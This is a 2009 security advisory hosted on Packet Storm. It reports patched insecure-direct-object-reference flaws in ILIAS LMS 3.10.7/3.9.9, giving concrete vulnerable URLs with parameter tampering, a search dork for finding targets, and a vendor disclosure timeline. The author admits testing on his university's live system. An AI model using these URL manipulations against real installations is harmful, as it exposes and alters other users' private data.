exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ILIAS LMS Information Disclosure

ILIAS LMS Information Disclosure
Posted Jul 15, 2009
Authored by YEnH4ckEr

ILIAS LMS versions 3.10.7 and below and 3.9.9 and below suffer from arbitrary information disclosure vulnerabilities.

tags | exploit, arbitrary, vulnerability, info disclosure
SHA-256 | 4385c99e7757b56e265ad1d18a7a6fe42c3809549e9c70771062653194e4ed55

ILIAS LMS Information Disclosure

Change Mirror Download
***********************************************************************************************
***********************************************************************************************
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **
** **
** **
** ME VOY A LA PLAYA!...QUE CALOoOoOoR!...Lo0oL **
** Ä„PROUD TO BE SPANISH! **
** **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
| MULTIPLE ARBITRARY INFORMATION DISCLOSURE AND EDITION |
|--------------------------------------------------------------------------------------------|
| | ILIAS LMS <= 3.10.7/3.9.9 | |
| CMS INFORMATION: ----------------------------------- |
| |
|-->WEB: http://www.ilias.de/ |
|-->DOWNLOAD: http://www.ilias.de/docu/goto.php?target=st_229_35&client_id=docu |
|-->DEMO: http://www.demo.ilias-support.com/ |
|-->CATEGORY: LMS/Education |
|-->DESCRIPTION: ILIAS is a powerful web-based learning management system that allows you |
| to easily manage learning resources in an integrated system. |
|-->RELEASED: 2009-06-22 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 |
|-->DORK: "powered by ILIAS" |
|-->CATEGORY: ARBITRARY INFORMATION EDITION/DISCLOSURE |
|-->AFFECT VERSION: 3.10.7/3.9.9 |
|-->Discovered Bug date: 2009-06-28 |
|-->Reported Bug date: 2009-06-28 |
|-->Fixed bug date: 2009-06-30 |
|-->Info patch (3.10.8/3.9.10): http://www.ilias.de/docu/goto.php?target=st_229_35 |
| &client_id=docu |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: YEnH4ckEr <--<3--> Marijose. |
| I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^ |
----------------------------------------------------------------------------------------------



<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>>



I used my own account in my university...sorry for testing :P



#################################
/////////////////////////////////

ARBITRARY INFORMATION DISCLOSURE

/////////////////////////////////
#################################



-------------------
-------------------

"POST-ITS" ISSUE:

-------------------
-------------------



When a user, teacher, admin, alumn, post a new post-its,
he could read all post-its in database.

The vuln link would be:

http://[HOST]/[PATH]/ilias.php?col_side=right&block_type=pdnotes&rel_obj=0&note_id=1&note_type=1&cmd=showNote&cmdClass=ilpdnotesblockgui&cmdNode=50&baseClass=ilPersonalDesktopGUI


Changing note_id=1 for other value, for ex. 100, we could
read this posts-it.

That seems a low risk vuln but, when i tested on-line, ie,
against my university and i've got a lot of sensitive information.



-------------------
-------------------

"CMD" ISSUE:

-------------------
-------------------



Course/group/... calendars:

This would be a normal link:


http://[HOST]/[PATH]/repository.php?cmd=frameset&ref_id=50438


But if I change cmd=frameset for cmd=edit:


http://[HOST]/[PATH]/repository.php?ref_id=50438&cmd=edit


I access to information about this group/course/..., and I tried to
change it, but i got permission denied...anyway, i
can get how it's configured this group/course/...



-------------------
-------------------

"CALENDAR" ISSUE:

-------------------
-------------------



http://[HOST]/[PATH]/ilias.php?seed=2009-06-28&category_id=847&calendar_mode=2&cmd=edit&cmdClass=ilcalendarcategorygui&cmdNode=6&baseClass=ilPersonalDesktopGUI


Changing category_id, it shows sensitive information about
any course/group/...

Personal and global calendars are secure.



#########################################
/////////////////////////////////////////

ARBITRARY INFORMATION DISCLOSURE/EDITION

/////////////////////////////////////////
#########################################



This module (favorite) allows to get a repository of favorite links



-------------------
-------------------

"FAVORITE" ISSUE:

-------------------
-------------------


This would be the vuln link:


http://[HOST]/[PATH]/ilias.php?bmf_id=1&obj_id=926&cmd=editFormBookmark&cmdClass=ilbookmarkadministrationgui&cmdNode=2&baseClass=ilPersonalDesktopGUI


GET var 'obj_id' is the vuln var...changing for other value you can view and edit any favorite link.


User (victim) trusts in these links (He posts them)



############
////////////

VIDEOS DEMO

////////////
############



ARBITRARY INFORMATION DISCLOSURE AND EDITION ("FAVORITES") --> http://www.youtube.com/watch?v=i6D6UVR0358

ARBITRARY INFORMATION DISCLOSURE ("POST-ITS") --> http://www.youtube.com/watch?v=eSPp1dswe1E



####################
////////////////////

DISCLOSURE TIMELINE

////////////////////
####################




**2009-06-28** ~~~~~> FIRST VULNS DISCOVERED

**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR

**2009-06-29** ~~~~~> OTHER SECURITY ISSUE DISCOVERED

**2009-06-29** ~~~~~> VULN REPORTED TO VENDOR WITH VIDEO AND REPORT

**2009-06-30** ~~~~~> VENDOR RESPONSED

**2009-06-30** ~~~~~> VENDOR CONFIRMED SECURITY ISSUES

**2009-06-30** ~~~~~> VENDOR FIXED SECURITY ISSUES IN SVN FOR 3.9/3.10/Trunk (AND CONFIRMS 3.9 AFFECTED)

**2009-06-30** ~~~~~> VENDOR CLARIFIED SECURITY ISSUES: "Confirm that all your exploits work in the latest published official release"

**2009-07-01** ~~~~~> VENDOR CONFIRMED NEXT RELEASE WILL CONTAIN THE FIXES

**2009-07-01** ~~~~~> I WILL WAIT NEXT RELEASE FOR FULL DISCLOSURE

**2009-07-08** ~~~~~> ILIAS LAUNCHED NEW STABLE RELEASE (3.10.8 / 3.9.10)

**2009-07-11** ~~~~~> I CONTACTED AGAIN TO SAY A DISCLOSURE DATE, STABLISHED FOR 2009-07-15 (WAIT ONE WEEK AFTER NEW RELEASE...)

**2009-07-12** ~~~~~> ILIAS AGREE WITH THIS DATE AND POSTED A LINK FOR CREDITS

**2009-07-15** ~~~~~> FULL DISCLOSURE...PUBLISHED ADVISORY.




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!




##############################################################################
##############################################################################
##**************************************************************************##
## SPECIAL THANKS TO: MILW0RM FOREVER!!...STR0KE THE BEST! ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close